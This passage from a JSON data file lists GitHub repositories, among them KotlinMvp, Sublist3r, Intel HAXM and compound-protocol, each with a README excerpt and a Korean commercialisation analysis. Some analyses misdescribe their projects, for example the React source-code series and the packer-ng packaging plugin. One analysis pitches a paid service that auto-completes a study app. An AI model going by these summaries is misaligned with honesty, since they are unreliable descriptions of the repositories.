만들기 위한 표준 템플릿으로 활용\n2. **SaaS 서비스 (앱 개발 교육 플랫폼)**: 초급 개발자","readme_excerpt":"# KotlinMvp\n\n[![](https://jitpack.io/v/git-xuhao/KotlinMvp.svg)](https://jitpack.io/#git-xuhao/KotlinMvp)\n[![Build Status](https://travis-ci.org/git-xuhao/KotlinMvp.svg?branch=master)](https://travis-ci.org/git-xuhao/KotlinMvp)\n[![CircleCI](https://circleci.com/gh/git-xuhao/KotlinMvp/tree/master.svg?style=svg)](https://circleci.com/gh/git-xuhao/KotlinMvp/tree/master)\n[![API](https://img.shields.io/badge/API-19%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=19)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/0ee634e0cc3042f8a98e33d6135f39a6)](https://www.codacy.com/app/git-xuhao/KotlinMvp?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=git-xuhao/KotlinMvp&amp;utm_campaign=Badge_Grade)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![](https://img.shields.io/badge/Author-xuhao-blue.svg)](http://xuhaoblog.com)\n[![](https://img.shields.io/badge/QQ-504105930-orange.svg)](h","composite_score":0.5364,"license_safety_tag":"safe"},{"name":"dundunnp/hamibot-auto_xuexiqiangguo","github_url":"https://github.com/dundunnp/hamibot-auto_xuexiqiangguo","stars":19,"language":"JavaScript","license":"MIT","abandonment_months":36,"description":"# dundunnp/hamibot-auto_xuexiqiangguo 분석\n\n## 왜 보물인가\n중국 학습 앱의 반복적인 학습 작업을 자동으로 완료해주는 도구로, 학생들의 시간을 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독으로 제공하는 자동 학습 완료 웹 서비스\n2. **내부 업무 도구**: 교육 기관이 학생 학습 ","readme_excerpt":"# auto_xuexiqiangguo\n\nauto_xuexiqiangguo 是一款自动化学习工具 每天可达满分🚩\n\n本项目旨在解放双手 让大家有更多时间做更有意义的事💪\n\n<img src=\"https://github.com/TechXueXi/TechXueXi/blob/master/img_folder/peoplelearning.jpg?raw=true\" alt=\"学 xi 情景\"/>\n\n<a href=\"https://github.com/dundunnp/auto_xuexiqiangguo/blob/version-15.71/LICENSE.txt\"><img src=\"https://img.shields.io/github/license/dundunnp/auto_xuexiqiangguo\"/></a>\n<a href=\"https://github.com/dundunnp/auto_xuexiqiangguo/network\"><img src=\"https://img.shields.io/github/forks/dundunnp/auto_xuexiqiangguo\"/></a>\n<a href=\"https://github.com/dundunnp/auto_xuexiqiangguo/stargazers/\"><img src=\"https://img.shields.io/github/stars/dundunnp/auto_xuexiqiangguo\"/></a>\n<a href=\"https://github.com/dundunnp/auto_xuexiqiangguo/watchers\"><img src=\"https://img.shields.io/github/watchers/dundunnp/auto_xuexiqiangguo\"/></a>\n<a href=\"https://github.com/dundunnp/auto_xuexiqiangguo/issues\"><img src=\"https://img.shields.io/github/issues/dundunnp/auto_xuexiqiangguo\"/></a>\n\n查看[指导手册](https://dundunnp.git","composite_score":0.5358,"license_safety_tag":"safe"},{"name":"alibaba/weex-ui","github_url":"https://github.com/alibaba/weex-ui","stars":11,"language":"Vue","license":"Apache-2.0","abandonment_months":61,"description":"# Weex-UI 저장소 분석\n\n## 왜 보물인가\n알리바바가 만든 모바일 앱 화면 디자인 도구로, 복잡한 앱 개발 과정을 빠르고 쉽게 만들 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 개발 플랫폼**: 기업들이 자체 앱을 빠르게 만들 수 있도록 돕는 SaaS 서비스로 제공\n2. **앱 개발사 내부 도구**: 디자이너와 개발자가 협업","readme_excerpt":"# Weex Ui\n[中文](README_cn.md) | [English](README.md)\n\n[![Build Status](https://img.shields.io/travis/apache/incubator-weex-ui.svg?style=flat-square)](https://travis-ci.org/apache/incubator-weex-ui)\n[![npm](https://img.shields.io/npm/v/weex-ui.svg?maxAge=3600&style=flat-square)](https://www.npmjs.com/package/weex-ui?_blank)\n[![NPM downloads](https://img.shields.io/npm/dm/weex-ui.svg?style=flat-square)](https://npmjs.org/package/weex-ui)\n[![NPM all downloads](https://img.shields.io/npm/dt/weex-ui.svg?style=flat-square)](https://npmjs.org/package/weex-ui)\n[![CNPM all downloads](http://npm.taobao.org/badge/d/weex-ui.svg?style=flat-square)](https://npm.taobao.org/package/weex-ui)\n[![GitHub last commit](https://img.shields.io/github/last-commit/apache/incubator-weex-ui.svg?style=flat-square)](https://github.com/apache/incubator-weex-ui/commits/dev)\n[![GitHub closed issues](https://img.shields.io/github/issues-closed/apache/incubator-weex-ui.svg?style=flat-square)](https://github.com/apache/in","composite_score":0.5358,"license_safety_tag":"safe"},{"name":"intel/haxm","github_url":"https://github.com/intel/haxm","stars":5,"language":"C","license":"BSD-3-Clause","abandonment_months":40,"description":"# Intel HAXM 상용화 분석\n\n## 왜 보물인가\n컴퓨터 성능을 빠르게 시뮬레이션하는 핵심 기술로, 안드로이드 앱 개발자들이 테스트 속도를 크게 단축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 가속화 SaaS**: 클라우드 기반 앱 테스트 환경을 제공하여 개발사들이 빠르게 앱을 검증하는 서비스\n2. **엔터프라이즈 내부 도구*","readme_excerpt":"# DISCONTINUATION OF PROJECT\n\nThis project will no longer be maintained by Intel.\n\nIntel has ceased development and contributions including, but not limited to, maintenance, bug fixes, new releases, or updates, to this project.\n\nIntel no longer accepts patches to this project.\n\nIf you have an ongoing need to use this project, are interested in independently developing it, or would like to maintain patches for the open source software community, please create your own fork of this project.\n\nContact: webadmin@linux.intel.com\n\n# Status\n\nHAXM was created to bring Intel Virtualization Technology to Windows and macOS\nusers. Today both Microsoft Hyper-V and macOS HVF have added support for Intel\nVirtual Machine Extensions. We have therefore decided to retire the HAXM\nproject. HAXM v7.8.0 is our last release and we will not accept pull requests or\nrespond to issues after this.\n\n# Intel Hardware Accelerated Execution Manager (HAXM)\n\n<img src=\"Installer/res/haxm_logo.ico\" height=\"176px\" align=\"r","composite_score":0.5357,"license_safety_tag":"safe"},{"name":"songwsx/person_search_demo","github_url":"https://github.com/songwsx/person_search_demo","stars":11,"language":"Python","license":"MIT","abandonment_months":69,"description":"","readme_excerpt":"person search\r\n===============\r\n\r\n<div align=\"center\">\r\n\r\n<img src=\"show.jpg\" width=\"900px\"/>\r\n\r\n<p> 对特定行人进行检索演示 .</p>\r\n</div>\r\n\r\n:trophy: 利用YOLOv3结合行人重识别模型实现场景图片的特定行人检索\r\n\r\n文章链接: https://zhuanlan.zhihu.com/p/82398949\r\n\r\n代码使用小教程：https://blog.csdn.net/songwsx/article/details/101693665\r\n\r\n------\r\n\r\n:running: Getting Started\r\n-----\r\n\r\n## :one: Clone the repo:\r\n\r\n```\r\ngit clone https://github.com/songwsx/person_search_demo\r\n```\r\n-----\r\n\r\n## :two: Dependencies\r\n\r\nTested under python3.6  Ubantu16.04\r\n\r\n- python packages\r\n  - opencv-python\r\n  - tb-nightly\r\n  - torch >= 1.0\r\n\r\n---------\r\n\r\n## :three: 权重文件下载\r\nYOLO是直接采用原来的权重文件，并且还支持YOLO-spp.\r\n行人重识别采用了Market1501、CUHK03和MSMT17三个数据集大概十七万张图片进行联合训练的，泛化性能更好。\r\n训练好的模型已经上传到了群文件中，欢迎加群下载，一起交流\r\n\r\n百度云链接：\r\n链接：https://pan.baidu.com/s/16kyogSsGwL2VgMkNSn9-zg \r\n提取码：f0g9 \r\n\r\n####  :point_right: 云深不知处-目标检测 763679865\r\n\r\n下载完成后，将权重文件放在新建的**person_search_demo/weights**文件夹下即可\r\n\r\n-----\r\n\r\n:four: 进行测试，查找特定行人\r\n--------\r\n\r\n```\r\npython search.py\r\n```\r\n\r\n结果将保存在output文件夹\r\n\r\n速度","composite_score":0.5356,"license_safety_tag":"safe"},{"name":"aboul3la/Sublist3r","github_url":"https://github.com/aboul3la/Sublist3r","stars":5,"language":"Python","license":"gpl-2.0","abandonment_months":22,"description":"# Sublist3r 수익화 분석\n\n## 왜 보물인가\n웹사이트의 숨겨진 하위 도메인을 자동으로 찾아주는 도구로, 보안 업체와 개발팀이 사이버 위협을 조기에 발견하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 월정액 구독형 '도메인 보안 감시 플랫폼'으로, 중소기업들이 자신의 웹사이트 취약점을 자동으로 모니터링하도록 서비스 ","readme_excerpt":"## About Sublist3r \n\nSublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.\n\n[subbrute](https://github.com/TheRook/subbrute) was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.\n\n## Screenshots\n\n![Sublist3r](http://www.secgeek.net/images/Sublist3r.png \"Sublist3r in action\")\n\n\n## Installation\n\n```\ngit clone https://github.com/aboul3la/Sublist3r.git\n```\n\n## Recommended Python Version:\n\nSublist3r currently supports **Python 2** and **Python 3**.\n\n* The recommended version for Python 2 is **2.7.x**\n* The recommended ","composite_score":0.5355,"license_safety_tag":"restricted"},{"name":"HashLips/generative-art-node","github_url":"https://github.com/HashLips/generative-art-node","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":38,"description":"# HashLips/generative-art-node 상업화 분석\n\n## 왜 보물인가\nAI가 자동으로 그림을 만들어주는 기술로, 게임 캐릭터나 NFT 아트 같은 디지털 작품을 빠르게 대량 생산할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 아트 생성 플랫폼**\n- 사용자가 웹사이트에 접속해 원하는 스타일로 그림을 생성하고 다","readme_excerpt":"# Welcome to HashLips 👄\r\n\r\nImportant: There is a new repo for this code.\r\n[https://github.com/HashLips/hashlips_art_engine](https://github.com/HashLips/hashlips_art_engine)\r\n\r\nAll the code in these repos was created and explained by HashLips on the main YouTube channel.\r\n\r\nTo find out more please visit:\r\n\r\n[📺 YouTube](https://www.youtube.com/channel/UC1LV4_VQGBJHTJjEWUmy8nA)\r\n\r\n[👄 Discord](https://discord.com/invite/qh6MWhMJDN)\r\n\r\n[💬 Telegram](https://t.me/hashlipsnft)\r\n\r\n[🐦 Twitter](https://twitter.com/hashlipsnft)\r\n\r\n[ℹ️ Website](https://hashlips.online/HashLips)\r\n\r\n# generative-art-node\r\n\r\nCreate generative art by using the canvas api and node js\r\n\r\n![](https://github.com/HashLips/generative-art-node/blob/main/src/preview.png)\r\n\r\n## Installation\r\n\r\n```sh\r\ngit clone https://github.com/HashLips/generative-art-node\r\n\r\nyarn install\r\n```\r\n\r\n## Usage\r\n\r\nCreate your different layers as folders in the 'layers' directory, and add all the layer assets in these directories. Optionally, append ","composite_score":0.5355,"license_safety_tag":"safe"},{"name":"kingoflolz/mesh-transformer-jax","github_url":"https://github.com/kingoflolz/mesh-transformer-jax","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":41,"description":"# Mesh Transformer JAX 상용화 분석\n\n## 왜 보물인가\n대규모 인공지능 모델을 여러 컴퓨터에 나누어 실행할 수 있는 핵심 기술로, 비용을 크게 줄이면서도 강력한 AI 서비스를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**SaaS 서비스**: 글쓰기, 코드 생성, 이미지 분석 등 AI 기반 웹 애플리케이션의 백엔드 엔진으로 제공하여","readme_excerpt":"# Table of contents\n1. [Mesh Transformer JAX](#mesh-transformer-jax)\n    1. [Updates](#updates)\n2. [Pretrained Models](#pretrained-models)\n   1. [GPT-J-6B](#gpt-j-6b)\n      1. [Links](#links)\n      2. [Acknowledgments](#acknowledgments)\n      3. [License](#license)\n      4. [Model Details](#model-details)\n      5. [Zero-Shot Evaluations](#zero-shot-evaluations)\n3. [Architecture and Usage](#architecture-and-usage)\n   1. [Fine-tuning](#fine-tuning)\n   2. [JAX Dependency](#jax-dependency)\n4. [TODO](#todo)\n\n# Mesh Transformer JAX\n\nA haiku library using the `xmap`/`pjit` operators in JAX for model parallelism of transformers.\n\nThe parallelism scheme is similar to the [original Megatron-LM](https://arxiv.org/abs/1909.08053), which is efficient\non TPUs due to the high speed 2d mesh network. There is also an experimental model version which implements [ZeRo style\nsharding](https://arxiv.org/abs/1910.02054).\n\nThis library is designed for scalability up to approximately 40B parameters on TPUv3s,","composite_score":0.5355,"license_safety_tag":"safe"},{"name":"rsapkf/goodies","github_url":"https://github.com/rsapkf/goodies","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":40,"description":"","readme_excerpt":"## [rsapkf/42]\n\n![George McFly, Back to the Future, at precisely 1:03:59](mcfly.png)\n\n@rsapkf's wiki.\n\n_Built with [Docusaurus](https://docusaurus.io/) (previously [mdBook](https://github.com/rust-lang/mdBook)). Search powered by [Algolia DocSearch](https://github.com/algolia/docsearch/)._\n","composite_score":0.5354,"license_safety_tag":"safe"},{"name":"rust-embedded/rust-raspi3-OS-tutorials","github_url":"https://github.com/rust-embedded/rust-raspi3-OS-tutorials","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":28,"description":"# Rust-Raspi3-OS-Tutorials 분석 보고서\n\n## 왜 보물인가\n라즈베리파이라는 저렴한 미니 컴퓨터에서 직접 운영체제를 만드는 방법을 배울 수 있는 실무 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **임베디드 교육 플랫폼**: 학생과 개발자가 저렴한 하드웨어로 OS 개발을 배우는 온라인 강좌로 월 구독 제공\n2. **기업 개발자 교육","readme_excerpt":"# Operating System development tutorials in Rust on the Raspberry Pi\n\n![](https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/workflows/BSP-RPi3/badge.svg) ![](https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/workflows/BSP-RPi4/badge.svg) ![](https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/workflows/Unit-Tests/badge.svg) ![](https://github.com/rust-embedded/rust-raspberrypi-OS-tutorials/workflows/Integration-Tests/badge.svg) ![](https://img.shields.io/badge/License-MIT%20OR%20Apache--2.0-blue)\n\n<br/>\n\n<img src=\"doc/header.jpg\" height=\"372\"> <img src=\"doc/minipush_demo_frontpage.gif\" height=\"372\">\n\n## ℹ️ Introduction\n\nThis is a tutorial series for hobby OS developers who are new to ARM's 64 bit [ARMv8-A\narchitecture]. The tutorials will give a guided, step-by-step tour of how to write a [monolithic]\nOperating System `kernel` for an `embedded system` from scratch. They cover implementation of common\nOperating Systems tasks, like writing to the seri","composite_score":0.535,"license_safety_tag":"safe"},{"name":"jonasschmedtmann/complete-node-bootcamp","github_url":"https://github.com/jonasschmedtmann/complete-node-bootcamp","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":19,"description":"# Complete Node Bootcamp 상용화 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 데 필요한 기본 기술들을 체계적으로 배울 수 있는 교육 자료로, 학습자들이 실제 서비스를 만들 수 있는 역량을 갖추게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**\n   - Udemy, Coursera 같은 강의 판매 플랫폼","readme_excerpt":"# Course Material and FAQ for my Complete Node.js, Express and MongoDB Bootcamp\n\nThis repo contains starter files and the finished project files for all the projects contained in the course (complete repo size is **288MB**).\n\nUse starter code to start each section, and **final code to compare it with your own code whenever something doesn't work**!\n\nPlus, I made all the [course slides available for download](theory-lectures.pdf), to make it easier to follow along the theory videos.\n\n👇 **_Please read the following Frequently Asked Questions (FAQ) carefully before starting the course_** 👇\n\n## FAQ\n\n### Q1: How do I download the files?\n\n**A:** If you're new to GitHub and just want to download the entire code, hit the green button saying \"Code\", and then choose the \"Download ZIP\" option.\n\n### Q2: I'm stuck in one of the projects. Where do I get help?\n\n**A:** Have you actually tried to fix the problem on your own? Have you compared your code to the final code? If you failed fixing your probl","composite_score":0.5347,"license_safety_tag":"unknown"},{"name":"mcxiaoke/packer-ng-plugin","github_url":"https://github.com/mcxiaoke/packer-ng-plugin","stars":7,"language":"Java","license":"Apache-2.0","abandonment_months":48,"description":"# packer-ng-plugin 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱을 더 효율적으로 압축하고 최적화할 수 있는 도구로, 모바일 앱 개발사들의 배포 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 게임사의 앱 최적화 서비스**: 게임 용량을 50% 이상 줄여 다운로드 속도 개선 및 스토어 순위 향상\n2. **앱 배포 자","readme_excerpt":"# Packer-NG Gradle Plugin V2\n\n### 提示：本项目已停止新功能开发，有需要的请自行Fork修改\n\n```\n对Gradle 7.x的支持，欢迎提PR，或者Fork自己修改（2022.06.27）\n```\n\n极速渠道打包工具\n\n- **v2.0.1 - 2018.03.23** - 支持Android Plugin 3.x和Gradle 4.x\n- **v2.0.0 - 2017.06.23** - 全新发布，支持V2签名模式，包含多项优化\n\n<!-- TOC -->\n\n- [特别提示](#特别提示)\n- [项目介绍](#项目介绍)\n- [使用指南](#使用指南)\n    - [修改项目配置](#修改项目配置)\n    - [修改模块配置](#修改模块配置)\n    - [插件配置示例](#插件配置示例)\n    - [渠道列表格式](#渠道列表格式)\n    - [集成打包](#集成打包)\n    - [脚本打包](#脚本打包)\n    - [代码中读取渠道](#代码中读取渠道)\n    - [文件名格式模版](#文件名格式模版)\n- [其它说明](#其它说明)\n- [关于作者](#关于作者)\n    - [联系方式](#联系方式)\n    - [开源项目](#开源项目)\n- [License](#license)\n\n<!-- /TOC -->\n\n## 特别提示\n\nV2版只支持`APK Signature Scheme v2`，要求在 `signingConfigs` 里 `v2SigningEnabled true` 启用新版签名模式，如果你需要使用旧版本，看这里 [v1.0.9](https://github.com/mcxiaoke/packer-ng-plugin/tree/v1.0.9)。\n\n## 项目介绍\n\n[**packer-ng-plugin**](https://github.com/mcxiaoke/packer-ng-plugin) 是下一代Android渠道打包工具Gradle插件，支持极速打包，**100**个渠道包只需要**10**秒钟，速度是 [**gradle-packer-plugin**](https://github.com/mcxiaoke/gradle-packer-plugin) 的**300*","composite_score":0.5344,"license_safety_tag":"safe"},{"name":"compound-finance/compound-protocol","github_url":"https://github.com/compound-finance/compound-protocol","stars":5,"language":"TypeScript","license":"BSD-3-Clause","abandonment_months":24,"description":"# Compound Protocol 분석\n\n## 왜 보물인가\n은행처럼 돈을 빌려주고 받는 금융 시스템을 직접 운영할 수 있게 해주는 오픈소스 기술로, 누구나 자신의 금융 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 금융 플랫폼**: 개인이 암호자산을 맡기면 이자를 받고, 필요한 사람은 담보로 돈을 빌리는 SaaS 서비스\n2. *","readme_excerpt":"[![CircleCI](https://circleci.com/gh/compound-finance/compound-protocol.svg?style=svg&circle-token=5ed19932325c559a06f71f87d69012aedd2cf3fb)](https://circleci.com/gh/compound-finance/compound-protocol) [![codecov](https://codecov.io/gh/compound-finance/compound-protocol/branch/master/graph/badge.svg?token=q4UvsvVzOX)](https://codecov.io/gh/compound-finance/compound-protocol)\n\nCompound Protocol\n=================\n\nThe Compound Protocol is an Ethereum smart contract for supplying or borrowing assets. Through the cToken contracts, accounts on the blockchain *supply* capital (Ether or ERC-20 tokens) to receive cTokens or *borrow* assets from the protocol (holding other assets as collateral). The Compound cToken contracts track these balances and algorithmically set interest rates for borrowers.\n\nBefore getting started with this repo, please read:\n\n* The [Compound Whitepaper](https://compound.finance/documents/Compound.Whitepaper.pdf), describing how Compound works\n* The [Compound Protocol S","composite_score":0.5344,"license_safety_tag":"safe"},{"name":"newbee-ltd/vue3-admin","github_url":"https://github.com/newbee-ltd/vue3-admin","stars":8,"language":"Vue","license":"GPL-3.0","abandonment_months":31,"description":"# Vue3 Admin 저장소 분석\n\n## 왜 보물인가\n기업의 내부 관리 시스템을 빠르게 만들 수 있는 기초 틀(템플릿)로, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 중소 기업 회계 관리 웹 서비스: 이 템플릿으로 빠르게 프로토타입을 만들어 출시할 수 있습니다.\n\n**2. 내부 업무 도구**\n","readme_excerpt":"# vue3-admin\n\nVue3 + Vite + Vue-Router + Element-Plus + Echarts + Axios 后台管理系统。\n\n![vue3-admin-summary](https://13-doc.oss-cn-beijing.aliyuncs.com/images/2022/03/vue3-admin-summary.png)\n\n![Build Status](https://img.shields.io/badge/build-passing-green.svg)\n![Version 3.0.0](https://img.shields.io/badge/version-3.0.0-yellow.svg)\n[![License](https://img.shields.io/badge/license-GPL3.0-blue.svg)](https://github.com/newbee-ltd/newbee-mall-vue3-app/blob/master/LICENSE)\n\nnewbee-mall 项目是一套电商系统，基于 Spring Boot 和 Vue 以及相关技术栈开发。 前台商城系统包含首页门户、商品分类、新品上线、首页轮播、商品推荐、商品搜索、商品展示、购物车、订单结算、订单流程、个人订单管理、会员中心、帮助中心等模块。 后台管理系统包含数据面板、轮播图管理、商品管理、订单管理、会员管理、分类管理、设置等模块。\n\n**vue3-admin** **版本线上预览地址：**[http://vue3-admin.newbee.ltd](http://vue3-admin.newbee.ltd)，测试账号密码：admin 123456\n\n## newbee-mall （新蜂商城）系列项目概览\n\n![newbee-mall-course-2023](https://github.com/newbee-ltd/newbee-mall-cloud/raw/main/static-files/newbee-mall-course-2023.png)\n\n| 项目名称             | 仓库地址                                                     | 备注     ","composite_score":0.5342,"license_safety_tag":"restricted"},{"name":"pim-book/programmers-introduction-to-mathematics","github_url":"https://github.com/pim-book/programmers-introduction-to-mathematics","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":39,"description":"# Programmers Introduction to Mathematics 분석\n\n## 왜 보물인가\n프로그래머가 알아야 할 수학 개념을 실제 코드 예제로 배울 수 있는 학습 자료로, 기술 기초가 약한 개발자들의 역량 강화에 직접 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 개발자 대상 수학 기초 강의 플랫폼으로 구독형 서비","readme_excerpt":"# A Programmer's Introduction to Mathematics\n\n[![CircleCI](https://dl.circleci.com/status-badge/img/gh/pim-book/programmers-introduction-to-mathematics/tree/master.svg?style=shield)](https://dl.circleci.com/status-badge/redirect/gh/pim-book/programmers-introduction-to-mathematics/tree/master) [![Coverage Status](https://coveralls.io/repos/github/pim-book/programmers-introduction-to-mathematics/badge.svg?branch=master)](https://coveralls.io/github/pim-book/programmers-introduction-to-mathematics?branch=master) [![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/pim-book/programmers-introduction-to-mathematics.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/pim-book/programmers-introduction-to-mathematics/context:python)\n\nThis repository contains the code implementing the applications from each\nchapter of [A Programmer's Introduction to Mathematics](https://pimbook.org).\nAll code is written in Python 3.x. Feel free to submit a pull request if you\nfind a bug.\n\nT","composite_score":0.5337,"license_safety_tag":"safe"},{"name":"7kms/react-illustration-series","github_url":"https://github.com/7kms/react-illustration-series","stars":5,"language":"TypeScript","license":"AGPL-3.0","abandonment_months":27,"description":"# React Illustration Series 상용화 분석\n\n## 왜 보물인가\n복잡한 그림과 애니메이션을 웹사이트에 쉽게 추가할 수 있는 도구로, 전문 디자이너 없이도 고급스러운 시각 효과를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 대시보드나 프레젠테이션 소프트웨어에 내장하여 차트와 데이터를 동적 일러스트레이션으","readme_excerpt":"# 图解 React 源码系列\n\n> `react`源码, 基于[`react@17.0.2`](https://github.com/facebook/react/tree/v17.0.2)(尽可能跟随 react 版本的升级, 持续更新). 用大量配图的方式, 致力于将`react`原理表述清楚.\n\n## 使用指南\n\n1. 本系列以 react 核心包结构和运行机制为主线索进行展开. 包括`react 宏观结构`, `react 工作循环`, `react 启动模式`, `react fiber原理`, `react hook原理`, `react 合成事件`等核心内容.\n2. 开源作品需要社区的净化和参与, 如有表述不清晰或表述错误, 欢迎[issue 勘误](https://github.com/7kms/react-illustration-series/issues). 如果对你有帮助, 请不吝 star.\n3. 本系列最初写作于 2020 年 6 月(当时稳定版本是 v16.13.1), 随着 react 官方的升级, 本 repo 会将主要版本的文章保存在以版本号命名的分支中.\n4. 当下前端技术圈总体比较浮躁, 各技术平台充斥着不少\"标题党\". 真正对于技术本身, 不能急于求成, 需要静下心来修炼.\n5. 本系列不是面经, 但会列举一些面试题来加深对 react 理解.\n6. 本系列所有内容皆为原创, 如需转载, 请注明出处.\n\n## 适用读者\n\n1. 对`react`,`react-dom`开发 web 应用有实践经验.\n2. 期望深入理解`react`内在作用原理.\n\n---\n\n## 版本跟踪\n\n> 本系列暂时只跟踪稳定版本的变动. `react`仓库代码改动比较频繁, 在写作过程中, 如果伴随小版本的发布, 文章中的源码链接会以写作当天的`最新小版本`为基准.\n\n- [`react@17.0.0`](https://github.com/facebook/react/releases/tag/v17.0.0)作为主版本升级, 相较于 16.x 版本, 在使用层面基本维持不变, 在源码层面需要关注的重大的变动如下\n\n\n    | 重大变动                                                      ","composite_score":0.5337,"license_safety_tag":"risky"},{"name":"wbkd/yet-another-webpack-es6-starterkit","github_url":"https://github.com/wbkd/yet-another-webpack-es6-starterkit","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":28,"description":"# wbkd/yet-another-webpack-es6-starterkit 분석\n\n## 왜 보물인가\n웹사이트나 웹앱을 만들 때 필요한 기초 틀(템플릿)을 제공하여, 개발자들이 처음부터 복잡하게 설정하지 않고 바로 작업을 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신규 웹 기반 소프트웨어 제품(예: 온라인 협업 도구,","readme_excerpt":"# Webpack Frontend Starterkit\n\nA lightweight foundation for your next webpack based frontend project.\n\n### Installation\n\n```sh\nnpm install\n```\n\n### Start Dev Server\n\n```sh\nnpm start\n```\n\n### Build Prod Version\n\n```sh\nnpm run build\n```\n\n### Features:\n\n- ES6 Support via [babel](https://babeljs.io/) (v7)\n- JavaScript Linting via [eslint](https://eslint.org/)\n- SASS Support via [sass-loader](https://github.com/jtangelder/sass-loader)\n- Autoprefixing of browserspecific CSS rules via [postcss](https://postcss.org/) and [postcss-preset-env](https://github.com/csstools/postcss-preset-env)\n- Style Linting via [stylelint](https://stylelint.io/)\n\nWhen you run `npm run build` we use the [mini-css-extract-plugin](https://github.com/webpack-contrib/mini-css-extract-plugin) to move the css to a separate file. The css file gets included in the head of the `index.html`.\n","composite_score":0.5336,"license_safety_tag":"safe"},{"name":"stfalcon-studio/ChatKit","github_url":"https://github.com/stfalcon-studio/ChatKit","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":49,"description":"# ChatKit 저장소 분석\n\n## 왜 보물인가\n채팅 기능을 쉽게 만들 수 있는 준비된 도구 모음으로, 앱 개발자들이 처음부터 다시 만들 필요 없이 빠르게 서비스를 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **고객 지원 채팅 SaaS**: 온라인 쇼핑몰이나 은행처럼 고객 문제를 빠르게 해결해주는 채팅 서비스로 월 이용료를 받을 수 있습니다.","readme_excerpt":"# ChatKit for Android\r\n\r\n[![](https://jitpack.io/v/stfalcon-studio/Chatkit.svg)](https://jitpack.io/#stfalcon-studio/Chatkit)\r\n\r\nChatKit is a library designed to simplify the development of UI for such a trivial task as chat. It has flexible possibilities for styling, customizing and data management\r\n\r\n<p align=\"center\">\r\n<img src=\"images/HEADER.jpg\">\r\n</p>\r\n\r\n### Features\r\n\r\n* Ready-to-use already styled solution for quick implementation;\r\n* Default and custom media messages;\r\n* Fully customizable layouts - setting styles out of the box (use your own colors, text appearances, drawables, selectors and sizes) or even create your own custom markup or/and holders for unique behaviour;\r\n* List of dialogs, including tete-a-tete and group chats, markers for unread messages and last user message view;\r\n* List of messages (incoming and outcoming) with history pagination and already calculated dates headers;\r\n* Different avatars with no specific realization of image loading - you can use any li","composite_score":0.5333,"license_safety_tag":"safe"},{"name":"jhaddix/tbhm","github_url":"https://github.com/jhaddix/tbhm","stars":5,"language":"","license":"unknown","abandonment_months":34,"description":"# jhaddix/tbhm 분석 리포트\n\n## 왜 보물인가\n웹 애플리케이션의 보안 취약점을 자동으로 찾아주는 실용적인 도구로, 기업의 시스템 안전을 지키는 데 직접적으로 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 웹사이트의 보안 진단을 자동화하는 월구독 서비스\n- **내부 업무 도구**: 대기업 IT팀이 자사 서비스의 ","readme_excerpt":"\n\n# The Bug Hunter's Methodology (TBHM)\n\nWelcome! This repo is a collection of \n\n - tips  \n - tricks\n - tools\n - data analysis\n - and notes\n\nrelated to web application security assessments and more specifically towards bug hunting in bug bounties. \n\nThe current sections are divided as follows:\n\n### Before You Get Hacking\n\n* [Learning Resources](/Learning.md)\n* [Content Creators and Influencers](/Content.md)\n\n### Reconassiance\n\n### Application Analysis\n\n* [Mapping](/03_Mapping.md)\n* [Authorization and Sessions](/04_Authorization_and_Session.md)\n* Tactical fuzzing\n  * [XSS](/05_XSS.md)\n  * [SQLi](/06_SQLi.md)\n  * [File Inclusion](/07_File_Upload.md)\n  * [CSRF](/08_CSRF.md)\n* [Privilege, Transport and Logic](/09_Privledge_Logic_Transport.md)\n* Web services\n* [Mobile vulnerabilities](/10_Mobile.md)\n\n### Other\n\n* [Auxiliary Information](/11_Auxiliary_Info.md)\n\n\nThe goal of the project is to incorporate more up to date resources for bug hunters and web hackers to use during thier day-to-day 